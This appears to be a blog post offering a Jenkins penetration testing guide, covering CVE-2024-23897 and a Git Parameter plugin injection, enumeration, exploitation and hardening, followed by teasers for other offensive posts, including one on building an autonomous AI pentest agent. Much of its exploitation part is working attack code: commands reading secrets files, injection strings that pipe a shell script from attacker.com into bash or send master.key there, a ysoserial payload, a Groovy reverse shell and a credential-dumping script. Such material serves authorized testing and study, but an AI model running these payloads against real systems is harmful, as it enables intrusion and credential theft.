Comprehensive Jenkins Penetration Testing Guide

-

Complete Security Assessment & Exploitation Framework

Jenkins Security Banner

Jenkins CI/CD Security - A Critical Component of DevSecOps

📑 Table of Contents

  1. Executive Summary
  2. Introduction to Jenkins Security
  3. Critical Vulnerabilities (2024-2025)
  4. Common Vulnerability Types
  5. Reconnaissance and Enumeration
  6. Authentication and Authorization Testing
  7. Exploitation Techniques
  8. Plugin Vulnerabilities
  9. Post-Exploitation
  10. Security Best Practices and Hardening
  11. Testing Checklist
  12. References

1. Executive Summary

Jenkins is a widely-used open-source automation server that facilitates continuous integration and continuous delivery (CI/CD) pipelines. Due to its central role in software development workflows, Jenkins instances often have access to sensitive credentials, source code repositories, and production deployment systems. This makes Jenkins a high-value target for attackers seeking to compromise software supply chains or gain access to critical infrastructure.

This comprehensive guide provides penetration testers, security researchers, and system administrators with detailed information about Jenkins security vulnerabilities, exploitation techniques, and hardening measures. The guide covers both Jenkins core vulnerabilities and plugin-specific issues, offering practical examples and remediation strategies.

CI/CD Pipeline Security

Modern CI/CD Pipeline with Security Integration Points

2. Introduction to Jenkins Security

2.1. Jenkins Architecture

Jenkins operates on a controller-agent architecture where the Jenkins controller (formerly called "master") manages the web interface, stores configurations, and orchestrates build jobs. Agents (formerly called "slaves") execute the actual build tasks. This distributed architecture introduces multiple attack surfaces that must be secured.

Jenkins Architecture

Jenkins Controller-Agent Architecture and Security Boundaries

2.2. Security Realms and Authorization

Jenkins supports multiple security realms for authentication, including Jenkins' own user database, LDAP, Active Directory, and various SSO solutions. Authorization strategies determine what authenticated users can do, ranging from simple "anyone can do anything" to complex role-based access control (RBAC) systems.

Jenkins Security Configuration

Jenkins Security Configuration Interface

3. Critical Vulnerabilities (2024-2025)

Jenkins Critical Vulnerabilities

Recent Critical Jenkins Vulnerability (CVE-2024-23897)

3.1. CVE-2024-23897 - Arbitrary File Read via CLI

CVE-2024-23897 CVSS 9.8 CRITICAL
⚠️ CRITICAL VULNERABILITY
Affected Versions: Jenkins ≤ 2.441, LTS ≤ 2.426.2
Discovery Date: January 2024
Status: Actively exploited in the wild

Description: Jenkins CLI uses the args4j library which has a feature (expandAtFiles) that replaces @ followed by a file path with the file's contents. This feature was enabled by default and not disabled in vulnerable Jenkins versions.

Attack Capabilities:

  • With Overall/Read permission: Read entire files from the Jenkins controller filesystem
  • Without Overall/Read permission: Read first 3 lines of any file
  • Binary file reading: Extract cryptographic keys from binary files

Exploitation Paths Leading to RCE:

bash 
# Read /etc/passwd (first 3 lines without authentication)
java -jar jenkins-cli.jar -s http://target:8080/ help "@/etc/passwd"
bash 
# Read entire file with Overall/Read permission
java -jar jenkins-cli.jar -s http://target:8080/ -auth user:token help "@/var/jenkins_home/secrets/master.key"
bash 
# Read hudson.util.Secret key
java -jar jenkins-cli.jar -s http://target:8080/ -auth user:token help "@/var/jenkins_home/secrets/hudson.util.Secret"

RCE Attack Vectors:

  1. Resource Root URLs RCE (Variant 1): Requires Resource Root URL enabled, WebSocket access, binary secret retrieval, and known username with Overall/Read
  2. Resource Root URLs RCE (Variant 2): Requires Resource Root URL enabled, binary secret retrieval, and any valid API token
  3. "Remember me" Cookie Forgery: Forge cookies to login as admin and access Script Console
  4. XSS via Build Logs: Forge serialized console note objects to inject JavaScript
  5. CSRF Protection Bypass: Forge valid CSRF tokens to perform unauthorized actions
  6. Secret Decryption: Decrypt all stored credentials using extracted master.key
⚠️ Mitigation:
• Update to Jenkins 2.442+ or LTS 2.426.3+
• Disable CLI if not needed: java -Dhudson.diyChunking=false -jar jenkins.war
• Restrict network access to CLI endpoints
• Monitor for suspicious CLI usage

3.2. CVE-2025-53652 - Command Injection via Git Parameter Plugin

CVE-2025-53652 CVSS 6.5 MEDIUM
⚠️ UNDERRATED VULNERABILITY
Affected Versions: Git Parameter Plugin ≤ 0.9.19
Discovery Date: August 2025
Actual Impact: HIGH - Enables full RCE despite medium CVSS score

Description: The Git Parameter plugin allows command injection through specially crafted Git repository URLs or branch names, enabling attackers to execute arbitrary OS commands on the Jenkins controller or agents.

bash 
# Malicious Git URL in job configuration
git@github.com:user/repo.git; whoami; #
bash 
# Branch name injection
origin/master; curl http://attacker.com/shell.sh | bash; #
bash 
# Advanced payload with data exfiltration
origin/main; cat /var/jenkins_home/secrets/master.key | base64 | curl -d @- http://attacker.com; #

4. Common Vulnerability Types

Jenkins Attack Framework

Jenkins as an Attack Target - Understanding the Threat Landscape

4.1. Cross-Site Scripting (XSS)

Description: Attackers inject JavaScript into Jenkins that executes in another user's browser when they view certain pages.

Types:

  • Stored XSS: Payload is permanently stored (e.g., in job descriptions, build logs)
  • Reflected XSS: Payload is included in a URL and executed when the victim clicks it

Impact: When the victim is an administrator with access to the Script Console, XSS can lead to complete system compromise through arbitrary code execution.

4.2. Cross-Site Request Forgery (CSRF)

Description: Attackers exploit Jenkins' trust in browser cookies to perform unauthorized actions on behalf of authenticated users.

Protection Mechanism: Jenkins uses crumbs (session-specific tokens) to protect POST requests. However, misconfigurations or vulnerabilities can bypass this protection.

4.3. Missing or Improper Permission Checks

Issue Type Description Impact
Credential Enumeration Form autocompletion endpoints exposing credential IDs Information disclosure leading to credential capture
HTTP Endpoint Access Unauthenticated access to system information System reconnaissance
API Abuse Missing permission checks on API endpoints Data exfiltration

4.4. Agent-to-Controller Security Issues

Description: Jenkins agents can potentially exploit vulnerabilities to execute code on the controller, escalating privileges and compromising the entire Jenkins instance.

Common Attack Vectors:

  • File Path Traversal: Agents writing files outside designated directories or reading sensitive controller files
  • Serialization Exploits: Malicious serialized objects sent from agent to controller
  • Command Injection: Agents injecting commands into controller processes
groovy 
// From compromised agent - read controller secrets
import hudson.FilePath
import jenkins.model.Jenkins

FilePath workspace = new FilePath(new File("/var/jenkins_home"))
FilePath secretFile = workspace.child("secrets/master.key")
println(secretFile.readToString())

4.5. Insecure Deserialization

Description: Jenkins uses Java serialization for various features including remoting, CLI, and agent communication. Insecure deserialization can lead to RCE.

bash 
# Using ysoserial to generate payload
java -jar ysoserial.jar CommonsCollections1 "curl http://attacker.com/shell.sh | bash" > payload.ser
bash 
# Send to Jenkins CLI
cat payload.ser | nc target 8080

5. Reconnaissance and Enumeration

5.1. Initial Discovery

bash 
# Nmap scan for common Jenkins ports
nmap -p 8080,8081,8090,9090 -sV --script http-title
bash 
# Check for Jenkins-specific headers
curl -I http://target:8080/

5.2. Version Enumeration

bash 
# Check version from login page
curl -s http://target:8080/login | grep -i "jenkins"
bash 
# API endpoint (may require authentication)
curl -s http://target:8080/api/json | jq -r '.version'

5.3. User Enumeration

💡 Multiple Enumeration Vectors
Jenkins provides several endpoints that can be used to enumerate users without authentication when anonymous read access is enabled.
bash 
# Via /people endpoint
curl -s http://target:8080/people | grep -oP 'href="/user/\K[^"]+' | sort -u
bash 
# Via API
curl -s http://target:8080/asynchPeople/api/json | jq -r '.users[].user.id'
bash 
# Via search suggest endpoint (autocomplete)
curl -s "http://target:8080/search/suggest?query=a" | jq -r '.suggestions[].name'
bash 
# Enumerate with different queries
for char in {a..z}; do
    curl -s "http://target:8080/search/suggest?query=$char" | jq -r '.suggestions[].name'
done | sort -u

7. Exploitation Techniques

7.1. Script Console Remote Code Execution

⚠️ Critical Exploit
The Script Console provides direct access to execute Groovy scripts on the Jenkins controller. This is the most powerful exploitation vector in Jenkins.

Basic Command Execution

groovy 
// Execute single command
def proc = "whoami".execute()
def os = new StringBuffer()
proc.waitForProcessOutput(os, System.err)
println(os.toString())

Linux Reverse Shell

groovy 
String host = "attacker-ip"
int port = 4444
String cmd = "/bin/bash"
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start()
Socket s = new Socket(host, port)
InputStream pi = p.getInputStream()
InputStream pe = p.getErrorStream()
InputStream si = s.getInputStream()
OutputStream po = p.getOutputStream()
OutputStream so = s.getOutputStream()
while(!s.isClosed()) {
    while(pi.available() > 0) so.write(pi.read())
    while(pe.available() > 0) so.write(pe.read())
    while(si.available() > 0) po.write(si.read())
    so.flush()
    po.flush()
    Thread.sleep(50)
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy()
s.close()

7.2. Credential Extraction

groovy 
// Extract username/password credentials
import com.cloudbees.plugins.credentials.CredentialsProvider
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials

def creds = CredentialsProvider.lookupCredentials(
    StandardUsernamePasswordCredentials.class,
    Jenkins.instance,
    null,
    null
)

for (c in creds) {
    println("ID: " + c.id)
    println("Username: " + c.username)
    println("Password: " + c.password)
    println("---")
}

8. Plugin Vulnerabilities

Statistics: 85% of Jenkins vulnerabilities are found in plugins, not the core. Common plugin vulnerability patterns include:

8.1. Credentials Exposure

bash 
# Credentials in build logs
curl http://target:8080/job/deploy/lastBuild/consoleText | grep -i password
bash 
# Credentials in API
curl http://target:8080/job/deploy/config.xml | grep password

8.2. XXE (XML External Entity) Injection

xml 


]>
&xxe;

8.3. SSRF (Server-Side Request Forgery)

bash 
# Force Jenkins to make requests to internal services
curl -X POST http://target:8080/job/test/build \
  -d "url=http://169.254.169.254/latest/meta-data/"

10. Security Best Practices and Hardening

DevSecOps Pipeline

Implementing Security in CI/CD Pipelines - DevSecOps Approach

✅ Essential Security Measures
  1. Disable Anonymous Access: Unless absolutely necessary
  2. Use Strong Authentication: LDAP/AD integration, SSO, MFA
  3. Implement RBAC: Matrix Authorization Strategy
  4. Enable Agent Security: Agent → Controller Access Control
  5. Regular Updates: Keep Jenkins and all plugins updated
  6. Network Segmentation: Isolate Jenkins from untrusted networks
  7. Audit Logging: Enable comprehensive audit trails
  8. Secrets Management: Use Credentials plugin, never plain text

11. Testing Checklist

11.1. Information Gathering

  • ☐ Identify Jenkins version
  • ☐ Enumerate installed plugins
  • ☐ Check for anonymous access
  • ☐ Enumerate users via multiple endpoints
  • ☐ Enumerate jobs and builds
  • ☐ Identify agent configurations

11.2. Vulnerability Testing

  • ☐ Test CVE-2024-23897 (arbitrary file read)
  • ☐ Test for default credentials
  • ☐ Test Script Console access
  • ☐ Test plugin vulnerabilities
  • ☐ Test agent-to-controller security
  • ☐ Test for insecure deserialization

11.3. Exploitation

  • ☐ Attempt RCE via Script Console
  • ☐ Extract stored credentials
  • ☐ Test build job manipulation
  • ☐ Test Jenkinsfile injection
  • ☐ Attempt privilege escalation

12. References

  1. Jenkins Official Security Documentation
  2. Jenkins Security Advisories
  3. CVE-2024-23897 Advisory
  4. CVE-2025-53652 Analysis
  5. OWASP Jenkins Security
  6. CISA Known Exploited Vulnerabilities

Disclaimer: This guide is for educational and authorized security testing purposes only. Always obtain proper authorization before testing any systems.

© 2025 - Comprehensive Jenkins Penetration Testing Guide

↑ Top

Comments

Post a Comment

Popular posts from this blog

Tutorial: Build an AI Penetration Tester with Claude (MCP + Burp)

-
Tutorial: Build an AI Penetration Tester with Claude (MCP + Burp) 🤖 Build Your Own AI Penetration Tester: Claude + MCP + Burp Suite A complete step-by-step tutorial to replicate autonomous security testing (25 labs + 2 BSCP exams solved) ⚡ Inspired by "Sonnet Took the Exam. I Just Watched." Originally published on Notion · Tutorial expanded for hands-on replication 🎯 What you'll build: An autonomous AI agent (Claude Sonnet 4.6) that can browse web apps via Playwright, inspect raw HTTP traffic via Burp Suite, and chain XSS → SQLi → RCE to solve PortSwigger labs — completely on its own. 📚 Table of Contents Overview & Architecture Prerequisites & Hardware Step 1: Install Claude Code & MCP Step 2: Configure Playwright MCP Server Step 3: Burp Suite & Burp MCP Integration ...
Read more

InfluxDB TCP 8086 (Default) — Authentication Bypass & Pentest Notes

-
``` Target: InfluxDB (port 8086) Affected versions: < 1.7.6 (CVE-2019-20933) Vulnerability description InfluxDB versions prior to 1.7.6 contain an authentication bypass in the authenticate function in services/httpd/handler.go . A crafted JWT token may contain an empty SharedSecret , allowing an attacker to bypass authentication and perform sensitive actions such as reading internal metrics, modifying data, or executing administrative operations. Risk No formal risk description available in original advisory. Impact depends on exposed instance and data sensitivity. Recommendation Upgrade to influxdb version 1.7.6~rc0-1 or later. Apply vendor-provided patches and restrict access to port 8086 with network controls. References Exploit: LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 CVE-2019-20933 — MITRE NVD — CVE-2019-20933 InfluxData patch commit Exploitation ...
Read more

Mastering PowerShell Execution Policy Bypass

-
📋 Table of Contents 1. Introduction to PowerShell Execution Policies 2. Understanding Execution Policy Mechanisms 3. Basic Bypass Techniques 4. Advanced Bypass Methods 5. PowerShell Script Signing 6. Converting PowerShell to Executables 7. Advanced Obfuscation Techniques 8. Steganographic Delivery Systems 9. Bypassing Reputation-Based Protection 10. Practical Implementation Scenarios 11. Detection Evasion Strategies 12. Conclusion and Best Practices 🔒 Introduction to PowerShell Execution Policies This guide is used in professional penetration testing training and aligns with MITR...
Read more